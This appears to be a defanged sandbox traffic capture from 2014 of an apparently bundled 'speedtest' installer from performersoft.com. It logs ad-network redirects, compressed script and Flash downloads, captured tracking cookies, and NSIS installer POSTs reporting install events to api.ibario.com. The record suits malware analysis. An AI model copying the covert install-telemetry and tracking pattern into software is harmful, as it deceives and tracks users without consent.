Alternate-Protocol: 80:quic<br><pre>GIF89aw...............................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>...............................................!..XMP DataXMP<?xpac<br>ket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns<br>:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/0<br>2/12-17:32:00        "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/19<br>99/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xm<br>p="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/<br>1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" <br>xmp:CreatorTool="Adobe Photoshop CS5 Macintosh" xmpMM:InstanceID="xmp.<br>iid:9ECF1E2B459411E1981CECE3D05E7624" xmpMM:DocumentID="xmp.did:9ECF1E<br>2C459411E1981CECE3D05E7624"> <xmpMM:DerivedFrom stRef:instanceID<br>="xmp.iid:69F7EFF4455511E1981CECE3D05E7624" stRef:documentID="xmp.did:<br>9ECF1E2A459411E1981CECE3D05E7624"/> </rdf:Description> </r<br>df:RDF> </x:xmpmeta> <?xpacket end="r"?>...............<br>......................................................................<br>.............................................~}|{zyxwvutsrqponmlkjihgf<br>edcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-, *)('&<br>%$#"! .................................!.......,....w...@.........</pre><<< skipped >>></font><br><br><font color="red">GET /ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Location: hXXp://VVV.google.com.ua/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y<br>
Cache-Control: private, max-age=43200<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Expires: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Server: adclick_server<br>
Content-Length: 701<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre><HTML><HEAD><meta http-equiv="content-type" content="te<br>xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE<br>AD><BODY>.<H1>302 Moved</H1>.The document has mov<br>ed.<A HREF="hXXp://VVV.google.com.ua/ads/conversion/983437618/?rand<br>om=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&v<br>alue=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=<br>ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&<br>;u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=ht<br>tp://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAg<br>AAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&am<br>p;random=1841122896&ipr=y">here</A>...</BODY></H<br>TML>..HTTP/1.1 302 Found..Location: hXXp://VVV.google.com.ua/ads/co<br>nversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt<br>=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u<br>_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=<br>0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc<br>_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&rand<br>om=1841122896&ipr=y..Cache-Control: private, max-age=43200..Date: Sat,<br> 09 Aug 2014 02:05:12 GMT..Expires: Sat, 09 Aug 2014 02:05:12 GMT..Con<br>tent-Type: text/html; charset=UTF-8..X-Content-Type-Options: nosniff..<br>Server: adclick_server..Content-Length: 701..X-XSS-Protection: 1; mode<br>=block..Alternate-Protocol: 80:quic..<HTML><HEAD><m</pre><<< skipped >>></font><br><br
<font color="red">GET /p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf?clickTAG=http://nym1.ib.adnxs.com/click?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYgb0cIAA./referrer=http%3A%2F%2FVVV.performersoft.com%2Fspeedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popmog.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%3Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU. HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Apache<br>
ETag: "03cacc7d05899aea99056522d1bc9eb6:1405419852"<br>
Last-Modified: Tue, 15 Jul 2014 10:24:07 GMT<br>
Accept-Ranges: bytes<br>
Content-Length: 50818<br>
Content-Type: application/x-shockwave-flash<br>
Date: Sat, 09 Aug 2014 02:05:09 GMT<br>
Connection: keep-alive<br><pre>CWS.....x.|..TSA.5...(.J.(HGz...Mz....:.;...... ....U .....J....@:.x..<br>..w...Y.d...N.............?.0;.=.........h.~....p9}..p[OKW.@F..@.\..4.<br>.in2...`.cag..}..-.....|,<...n2.pss?"...,.rv...2.......J:.9!..M..H:<br>.8......30.s.......3.3.HH.... .....-..F.H.p.H...../.....2.r2^..:2r:..&<br>gt;. .p......t..@FAIE*S...Bv..?....B. .t..<..M|_.J>O..SP/.......<br>.TN..1J....qF...3..G.o..5. .....$....W..O... 9=......).#......... '..#<br>........4.......k4|/.)...x........`..~.|........<.W...>38U3.><br>....oM..i...c..d|D..:.J..?.."..xn...Yz. ......O)HO.!y.N....-..-.3. .x.<br>..A.xG.........-..K_Z.>....xe...]2.u.(.3.....g....]I.2.{.Fk..f`!. )<br>w.O*[email protected].`....dR.....m.....C4F..]..|8...8....l....F.....(....|x<br>.O...X@k6.\.../e..O....4....d"6..{..E..5C.'=N.?!.5...j%..V..v n....NU.<br>(.qr.E.%..E1.U..!%.y.t..4....S8...t.F7.v.01..lC....c.......s.N..'bv.^.<br>1.e4y..Z.:.............17.......Bg."[email protected]..].....6M4o..RH..T..........<br>..<.W.4.e..&4C..)#..:<.o...1.v.7Yg.......{......q..........13aQ.<br>#)OP.a,...._D...{...\9......P..VT..;V........8..b.....{......*.T)4....<br>z./.....4.?Q.7.B...*O)[....*.G....Z.'/...w....}}s_?....wM.,.".....&...<br>Y......l&....|...F.z^M.1.J...I.4).....h._..V....\.#..u[.._Z....^T..k.2<br>c}.(........!*..2.D>.p..=u{......1_0...;..hI......Y....U.......C9..<br>.....5.~a.$..y....%.....Ry..7..{..u.....{17..y..Sv/....k..P.u..i..q..q<br>...,..;..[...:.-........V...W\.?}j...3r.R..X...%..W[.z....g.fc..T...S.<br>Zf;[email protected][1....Z..~..$!.r.u.A..8.J.../W_i./.......0.....<br>.i....o..%7.?..yj..!..^..H{J.....\D..a.4..[7..{.l*u.>.. Vf.....</pre><<< skipped >>></font><br><br><font color="red">GET /ANX_async_usersync.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Apache<br>
ETag: "e3de0e76c13e81e3b0683dac240498eb:1377552334"<br>
Last-Modified: Mon, 26 Aug 2013 21:25:34 GMT<br>
Accept-Ranges: bytes<br>
Content-Type: application/x-javascript<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 509<br>
Date: Sat, 09 Aug 2014 02:05:10 GMT<br>
Connection: keep-alive<br><pre>...........TM..0.=.....\Q.p.*Z.ho.'.H.E.=I....N....g.$m.v....)...f.s..<br>.|\.-D..,...(..V3]...FfN~...q...[X....2jg.p...8.........,.M).E...H....<br>..-P..Dn...;...M..h.....v.6r.ADx4.Nl..'......z....O.k.U.....x.k...1...<br>W:4F....Y.)w.D.c6B.d..I.......H...;.....X.L./1.h.c..(.t.6N.4.o..N:C..X<br>.\...G....F..5}G(..v.K.].......2..<."S.[.)m....`i..r....ax...j...w.<br>........X.v..F....t.XX.n."'_.Md.0..........L..[oR.4........>..(.&..<br>.M6...p..mu.?..I....z........^[..\.(d....Q...F..@..\.../..:6..!.^. ..,<br>./.,H).|..0g.z...k../g...HTTP/1.1 200 OK..Server: Apache..ETag: "e3de0<br>e76c13e81e3b0683dac240498eb:1377552334"..Last-Modified: Mon, 26 Aug 20<br>13 21:25:34 GMT..Accept-Ranges: bytes..Content-Type: application/x-jav<br>ascript..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Length<br>: 509..Date: Sat, 09 Aug 2014 02:05:10 GMT..Connection: keep-alive....<br>.........TM..0.=.....\Q.p.*Z.ho.'.H.E.=I....N....g.$m.v....)...f.s...|<br>\.-D..,...(..V3]...FfN~...q...[X....2jg.p...8.........,.M).E...H......<br>-P..Dn...;...M..h.....v.6r.ADx4.Nl..'......z....O.k.U.....x.k...1...W:<br>4F....Y.)w.D.c6B.d..I.......H...;.....X.L./1.h.c..(.t.6N.4.o..N:C..X.\<br>...G....F..5}G(..v.K.].......2..<."S.[.)m....`i..r....ax...j...w...<br>......X.v..F....t.XX.n."'_.Md.0..........L..[oR.4........>..(.&...M<br>6...p..mu.?..I....z........^[..\.(d....Q...F..@..\.../..:6..!.^. ..,./<br>.,H).|..0g.z...k../g.....</pre><<< skipped >>></font><br><br
<font color="red">GET /js/130131868.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.optimizely.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Encoding: gzip<br>
Accept-Ranges: bytes<br>
Cache-Control: max-age=120<br>
Content-Type: text/javascript<br>
Date: Sat, 09 Aug 2014 02:05:04 GMT<br>
Etag: "b49f06288845e4dd4b6f014e890160ac"<br>
Last-Modified: Tue, 05 Aug 2014 06:46:29 GMT<br>
Server: ECS (dca/FEAB)<br>
Timing-Allow-Origin: *<br>
Vary: Accept-Encoding<br>
x-amz-id-2: rxUZeSGOxkZrChX9 Zt8gC5ZzEmnMaRoNTONdeh8R6oO9rbgeL6YTNnxbmHlgu74<br>
x-amz-request-id: EE083D5DBBB51256<br>
X-Cache: HIT<br>
Content-Length: 48323<br><pre>.....}.S....ic...(.]..b.x...%.&..f.L'.l.d..J..H.....,#...=......}...."<br>A.88..9h4.?wx?.W.|.z..(.O.....po....."}w..W.M..)..)Ro..]..^.....%..~..<br>V.x>..R(y7.q....7..`.........0.I...[w;.'a.....j...i.a..fI.......V.4<br>.3.|r..}7.;.[.....Y...].......}.....*..vL......|..{.l/...X...0.i1.K..O<br>Pp._....c7...$............_[N..j.$.x.yA........y6s.}...a.D...q*.......<br>[email protected]..".[9^ ..Owi........^./.A.?.....<br>.."....w.S.u....:4..0[,W...$...v................fy....7KG.u.;.........<br>.2....s.o^..L)@....f...~.....JN&.....".fi....}*..|.v<_....K.q.3....<br>..."]...........E.sz..}..]|.O....3.....i..s|F...ju.....^......u....4..<br>.q9...l4.G.t......C..._..`...........ny...V.A.R.....RW0..=....sq..\t.[<br>.T......e..a....._..t.........O..6......Y.{....?.&s...9.@/....gy..0._6<br>?g.'.'P....L..,_...........4..r....(...L...Y>.(.....9.F.......W..).<br>.y..9...Z..=99...]\..&.."._..3x(..{vz~........)|..G.'.`..@.{..(.t:'...<br>gI.bp.;r.8b.$..E.~...C..S....p...}....O.-4;.<.oO..=.Z.,...N...`.../<br>N.#..sy.U..m....m]m.m.c.G0.....N.../......U...O.;'.v.G.E.O_.l..<...<br>''...9.......O/v..i.......s............u......_va......q..ag..qw/a..uO<br>........}g.g.=v.S~z..}D......n..j..}~.....n....Ow.]............L..3<<br>;V..j~....'6......0:9;..NN..........%....<=N./.....2M..]D'.q.Gi...a<br>..>3..V.H.C....q...8....t*........>}K..M.b`..g.ez4.X..p'.6|...*]<br>.ta*[email protected]:g...d.l.[...{.ONO....O...5..dPC....<.%..u.N......q<br>~zz.=?....Y....R...]^...........qt.9..s$N.........;g.....rC6q.=.~.w.).<br>...pjG.....c.........1pM..Q....8::;.._........c.Mu/a.....)`.S.\.p.</pre><<< skipped >>></font><br><br
<font color="red">GET /ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Location: hXXp://VVV.google.com.ua/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y<br>
Cache-Control: private, max-age=43200<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Expires: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Server: adclick_server<br>
Content-Length: 700<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre><HTML><HEAD><meta http-equiv="content-type" content="te<br>xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE<br>AD><BODY>.<H1>302 Moved</H1>.The document has mov<br>ed.<A HREF="hXXp://VVV.google.com.ua/ads/conversion/993973503/?rand<br>om=147077969&cv=7&fst=1407549900333&num=1&fmt=2&va<br>lue=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=O<br>N&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&<br>u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=htt<br>p://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgA<br>AAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&<br>;random=2164007956&ipr=y">here</A>...</BODY></HT<br>ML>..HTTP/1.1 302 Found..Location: hXXp://VVV.google.com.ua/ads/con<br>version/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2<br>&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w<br>=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&<br>frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_i<br>d=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random<br>=2164007956&ipr=y..Cache-Control: private, max-age=43200..Date: Sat, 0<br>9 Aug 2014 02:05:12 GMT..Expires: Sat, 09 Aug 2014 02:05:12 GMT..Conte<br>nt-Type: text/html; charset=UTF-8..X-Content-Type-Options: nosniff..Se<br>rver: adclick_server..Content-Length: 700..X-XSS-Protection: 1; mode=b<br>lock..Alternate-Protocol: 80:quic..<HTML><HEAD><met</pre><<< skipped >>></font><br><br
<font color="red">GET /css?family=Open Sans:400,600,700,800 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: fonts.googleapis.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: text/css<br>
Timing-Allow-Origin: *<br>
Expires: Sat, 09 Aug 2014 02:05:05 GMT<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Cache-Control: private, max-age=86400<br>
Content-Encoding: gzip<br>
Content-Length: 262<br>
X-Content-Type-Options: nosniff<br>
X-Frame-Options: SAMEORIGIN<br>
X-XSS-Protection: 1; mode=block<br>
Server: GSE<br>
Alternate-Protocol: 80:quic<br><pre>.............N.@...}..A.aHi..........Bv.p.I...K)[email protected]..<br>|N..QJ.!!...M6L[..t.8HH.6.b... ...2....-OH.J.Fl.J...6...$t.Z..@c......<br>N..K.k....n)_. Xw.........]..o..,V...\>W...=.D.....Y....A?...N.....<br>.j.{...(...4...;..M...*.A....gy...ao...gT...k..j#......HTTP/1.1 200 OK<br>..Content-Type: text/css..Timing-Allow-Origin: *..Expires: Sat, 09 Aug<br> 2014 02:05:05 GMT..Date: Sat, 09 Aug 2014 02:05:05 GMT..Cache-Control<br>: private, max-age=86400..Content-Encoding: gzip..Content-Length: 262.<br>.X-Content-Type-Options: nosniff..X-Frame-Options: SAMEORIGIN..X-XSS-P<br>rotection: 1; mode=block..Server: GSE..Alternate-Protocol: 80:quic....<br>...........N.@...}..A.aHi..........Bv.p.I...K)[email protected]..|N<br>..QJ.!!...M6L[..t.8HH.6.b... [email protected].<br>.K.k....n)_. Xw.........]..o..,V...\>W...=.D.....Y....A?...N......j<br>.{...(...4...;..M...*.A....gy...ao...gT...k..j#........</pre></font><br><br
<font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: d360c61977da6f671ee04b0f0db5d6753737a7ee<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 180<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:50","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"697294400","component_id":"696","cid":"4751","action":"install","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:01 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..HTTP/1.1 200 OK..Serve<br>r: nginx..Date: Sat, 09 Aug 2014 02:05:01 GMT..Content-Type: applicati<br>on/json..Transfer-Encoding: chunked..Connection: keep-alive..Keep-Aliv<br>e: timeout=2..Vary: Accept-Encoding..X-Powered-By: PHP/5.4.13..Access-<br>Control-Allow-Origin: *..27..{"flash":{},"error":false,"status":200}..<br>0..</font>....</pre></font><br><br><font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: 46496a7ea9094c0db7f1e6beb71b3a45e4bdedcf<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 176<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:51","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"931079049","component_id":"","cid":"4751","action":"finish","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:02 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..</pre></font><br><br
<font color="red">GET /pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: googleads.g.doubleclick.net<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://VVV.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br>
Set-Cookie: test_cookie=CheckForPermission; expires=Sat, 09-Aug-2014 02:20:12 GMT; path=/; domain=.doubleclick.net<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 302 Found..P3P: policyref="hXXp://googleads.g.doublecli<br>ck.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND<br> UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Date: Sat, 09 Aug 2<br>014 02:05:12 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00<br> GMT..Cache-Control: no-cache, must-revalidate..Location: hXXp://VVV.g<br>oogle.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549<br>900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&g<br>uid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_<br>nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/%<br>3Fcid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&co<br>nvclickts=0&random=1841122896..Content-Type: text/html; charset=UTF-8.<br>.X-Content-Type-Options: nosniff..Content-Encoding: gzip..Server: cafe<br>..Content-Length: 76..X-XSS-Protection: 1; mode=block..Alternate-Proto<br>col: 80:quic..Set-Cookie: test_cookie=CheckForPermission; expires=Sat,<br> 09-Aug-2014 02:20:12 GMT; path=/; domain=.doubleclick.net............<br>..(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....h.?.....</pre><<< skipped >>></font><br><br
<font color="red">GET /speedtest/?cid=4751 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:03 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.17<br>
Set-Cookie: cid=4751; expires=Mon, 08-Sep-2014 02:05:03 GMT; path=/; domain=.performersoft.com<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><pre>2495.............}.v.6....V..Q.Ur#Q.e'>.Y.....$n.|.N& ?DB.b.d....._<br>..s5.7O2... ...vz5ncS$....{......<......f.P..~....ht....'..........<br>.(.^O\.22:.q$.n....hL.,..v...7.xq:.^..~@X}.l/;Y...dA...{.4..Y....8...=<br>..........h.T'.0.?lt.~.yq....M....g...........]..i..v..Q../...u...7..D<br>........x...aT..r3.I.S.._s}=l..Q...s.HTC..i......S:..T.Fe.<.wv...s.<br>t...s...t...x...D.@\*..v.../.35l\..<N.S..`....O[.....=.Q0.A6....!.T<br>Vo..2..k.........@.|dr.Se...%`./."...0..q>[email protected]!.i.<..Up...B.o<br>_.B.}.mq...01.K...'..@. U.@k?A .&.F...bV.8.."..".Sq.hR.S...%a...W 6p3.<br>j#..Rki.8....:...T..........$T2....7..X.t...LT....i...k?.....n........<br>"Tf......Y...8....3.h..n...,...M|.`d%wI#[email protected]...;}o..{3.-.d....7...<br>.{..u.bP.q...........ck.G...n.v.....l.6..o...E...,2.........az...o....<br>.........3..!......M/...%.I>.a1....0.....\....6.....*..4T...o.K.3x&<br>lt;Q.}f.,....H$.z.{{ =i..?....ur0...B..H]...fO...j.$.......v...]..4j..<br>l^Y.:...8T~zo..D6...s"[M.G.-...;.[[....u.=j......$..u...y 